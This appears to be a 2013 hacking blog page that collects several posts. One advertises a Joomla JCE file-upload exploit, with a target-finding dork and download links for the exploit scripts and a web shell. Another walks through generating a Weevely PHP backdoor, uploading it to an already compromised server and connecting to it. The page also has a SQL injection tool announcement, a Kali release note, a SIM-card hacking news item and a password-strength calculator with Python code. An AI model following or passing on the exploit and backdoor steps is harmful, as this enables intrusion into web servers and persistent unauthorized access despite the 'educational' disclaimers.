Saturday, July 27, 2013

Joomla JCE Remote File Upload exploit (Zero Day)

Exploit name: Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 - PHP Version

DORK: inurl:/images/stories/

Vulnerable Version: JCE 2.0.10 (prior versions may also be affected). Despite the title, this JCE image-manager upload bug had been public for a long time by 2013 and current JCE releases are not affected; updating the extension closes it.

Exploitation: Remote with browser

Coded By: Mostafa Azizi

DOWNLOAD LINKS:

JCE.php --- http://adf.ly/SyEvh
joomla.pl --- http://adf.ly/SyEzw
upload.php --- http://adf.ly/SyF6b
Madspot shell --- http://adf.ly/SyFYY


Kali Linux 1.0.4 Released


In keeping with our tradition of publishing new releases during the annual Black Hat and DEF CON conferences, we are pleased to announce the availability of Kali Linux 1.0.4. The last few months since the initial release of Kali have seen a large number of changes, upgrades, and improvements in the distribution, all of which are included in version 1.0.4.




Kali Linux is an open source project developed by Offensive Security as the successor to BackTrack Linux. This release adds more new tools.




In addition to the new tools added to the distribution, version 1.04 of Kali Linux also contains many upgraded packages. Some of the more notable updates are:




For more information on Kali Linux see the official blog, or get the ISO image from the download page.



As usual, you do not need to re-download Kali Linux 1.0.4 if you already have it installed. A regular “apt-get update && apt-get dist-upgrade” will do the job of getting you to the latest and greatest!

SIM Cards can be Hacked; "Give me any phone number and I will clone it", researcher says

Everyone knows by now that a modern mobile phone can be hacked, but this time the flaw is in the SIM card itself. It was discovered by German security researcher Karsten Nohl, who has informed mobile operators of the danger.

Mobile phone users have been put on alert that their SIM cards can be hacked at any time, leading to fraud and soaring premium-rate bills.

The mobile operators, for their part, say they are already aware of the flaw and are taking steps to patch it before customers are hit.

Mobile phones are used worldwide to access online banking and other sensitive personal information, so a flaw of this kind in the hands of criminals would be a privacy disaster; it is also bad news for customers who use their smartphones to pay bills and transfer money.

The flaw is due to ageing SIM card security technology, which has struggled to keep up with high-tech smartphones such as the iPhone and Samsung's Galaxy S4.

Nohl says of the flaw:

“Give me any phone number and there is some chance I will, a few minutes later, be able to remotely control this SIM card and even make a copy of it,”

The hack works by abusing the over-the-air (OTA) update mechanism operators use to manage SIM cards: binary SMS messages signed with a key held on the SIM. Where that key is still a single-DES key, a properly equipped attacker can recover it, and with it send the SIM signed commands of his own, including loading an applet from which fraudulent activity can be carried out.

Nohl said that a quarter of all SIM cards he tested could be hacked.

However, the GSMA, the international umbrella organisation of mobile operators, said that the flaw was limited to a minority of SIM cards and that newer cards may not be affected. It said it had advised operators of the security risks involved.


From: http://hackersnewsbulletin.com

HOW CAN YOU MAKE YOUR PASSWORD UNBREAKABLE ?

Search Space Calculator:

So what does it do?

This calculator is designed to help users understand how many passwords can be created from different combinations of character sets (lowercase only, mixed case, with or without digits and special characters, etc.) and password lengths.

The calculator then puts the resulting large numbers (with lots of digits or large powers of ten) into a real-world context: the time that would be required, at differing search speeds, to exhaustively search every password up through that length using the chosen alphabet.

On the same page you will find password-related links and much more than you would expect.

It is hosted by Gibson Research Corporation (GRC, US). One caveat: the calculator measures resistance to exhaustive search only. A password built from a dictionary word plus a capital letter, digits and a symbol scores a huge search space but falls to a wordlist with mangling rules in seconds, so treat the number as an upper bound on strength, not a measure of it.

Good luck ;)
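As an added example (not code from GRC's page or from this post), here is the haystack arithmetic the calculator does, written in Python, followed by the check it leaves out: whether the password is a dictionary word with a few common mangling rules applied. The symbol set, the guessing rates and the tiny wordlist are assumptions chosen for the example.

```python
# Character classes the calculator lets you pick; 33 printable ASCII symbols
# including space. These are the assumptions used for the example.
CLASSES = {
    "lower": "abcdefghijklmnopqrstuvwxyz",
    "upper": "ABCDEFGHIJKLMNOPQRSTUVWXYZ",
    "digit": "0123456789",
    "symbol": " !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~",
}

# Guessing rates to put the numbers in context (assumed, not measured).
RATES = {
    "online, throttled (1,000/s)": 1e3,
    "offline, fast hash on GPUs (100 billion/s)": 1e11,
}


def alphabet_size(password):
    """Size of the union of every character class the password uses."""
    return sum(len(chars) for chars in CLASSES.values()
               if any(c in chars for c in password))


def search_space(password):
    """Candidates an exhaustive search covers to reach this password's length:
    every string of length 1..len(password) over the inferred alphabet."""
    n = alphabet_size(password)
    return sum(n ** k for k in range(1, len(password) + 1))


def time_to_exhaust(password):
    """Seconds to search the whole space at each assumed rate."""
    space = search_space(password)
    return {name: space / rate for name, rate in RATES.items()}


def mangle(word):
    """A handful of the rules a cracker applies to a wordlist long before it
    falls back to brute force."""
    for base in (word, word.capitalize(), word.upper()):
        yield base
        for suffix in ("1", "123", "!", "1!", "123!", "2013"):
            yield base + suffix


def cracked_by_wordlist(password, wordlist):
    """True if the password is a wordlist entry or a simple mangling of one."""
    return any(candidate == password
               for word in wordlist for candidate in mangle(word))


if __name__ == "__main__":
    for pw in ("Password123!", "fj3#Lp9qZt"):
        print(pw, "search space:", search_space(pw))
        print("   ", time_to_exhaust(pw))
        print("    wordlist hit:", cracked_by_wordlist(pw, ["password", "secret"]))
```

Password123! has a search space of roughly 10^23 and still falls to a two-word list with one rule, which is the point of the caveat above; a random ten-character string with the same character classes has a smaller haystack and is the stronger password of the two.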

Friday, July 26, 2013

DroidSQLi : First automated MySQL Injection tool for Android

DroidSQLi is the first automated MySQL injection tool for Android. It lets you test your MySQL-based web application against SQL injection attacks.

DroidSQLi supports the following injection techniques:

  • Time-based injection

  • Blind injection

  • Error-based injection

  • Normal injection

It automatically selects the best technique to use and employs some simple filter evasion methods.


Legal notice: this application is for educational purposes ONLY. No warranties of any kind are expressed or implied. Use at your own risk!



How to make a backdoor using Weevely

Today I'll show you how to use Weevely to plant a backdoor on a server. I'm not going to explain the Linux commands themselves.

Requirements:-

  • Backtrack

  • Shelled server

  • Basic knowledge of Linux commands

Here we go :)

  • Open a terminal and go to the tool's directory: cd /pentest/backdoors/web/weevely

  • In the same directory type ./weevely.py and hit enter. [It shows you the usage of weevely.]

  • Now type ./weevely.py generate <password> <location where you want to save the file>. [generate creates the PHP agent file which Weevely uses as the door between you and the server; the password is what your client has to present before the agent executes anything.]

  • Upload the file you just generated to your shelled server.

  • After uploading it, copy the URL of the uploaded file and type ./weevely.py <url> <password>

  • Hit enter ;)

  • Boom!! Now you are connected to the server :D

This is only for educational purposes; we are not responsible for any harm or illegal activity done by you.